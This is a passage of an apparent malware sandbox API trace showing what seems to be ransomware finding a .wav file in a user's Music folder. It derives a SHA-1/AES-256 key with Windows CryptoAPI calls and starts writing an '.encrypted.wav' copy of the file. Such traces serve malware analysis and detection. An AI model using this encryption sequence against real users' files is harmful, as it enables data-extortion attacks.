HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VkXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kXOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XOg3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Og3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZaH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aH-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jgJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gJS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="027TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="27TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7TWp.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.859] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.859] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.859] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.859] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.859] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.859] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.859] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.859] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.859] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7f81270, ftCreationTime.dwHighDateTime=0x1d5bdc1, ftLastAccessTime.dwLowDateTime=0x509ea0e0, ftLastAccessTime.dwHighDateTime=0x1d5bc01, ftLastWriteTime.dwLowDateTime=0x509ea0e0, ftLastWriteTime.dwHighDateTime=0x1d5bc01, nFileSizeHigh=0x0, nFileSizeLow=0xfa32, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="ZaH-2jgJS1xf027TWp.wav", cAlternateFileName="ZAH-2J~1.WAV")) returned 0x7c2100 [0038.859] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.860] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.860] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.860] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.860] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.860] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0038.861] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.861] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.861] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.861] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.861] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.862] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.862] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.862] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.862] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.862] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.862] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0038.862] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.862] CryptDestroyHash (hHash=0x7c2240) returned 1 [0038.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\zah-2jgjs1xf027twp.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.862] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.862] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0038.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0038.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.863] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.863] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0038.863] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.864] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x")) returned 0x10 [0038.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0038.865] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\ZaH-2jgJS1xf027TWp.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js 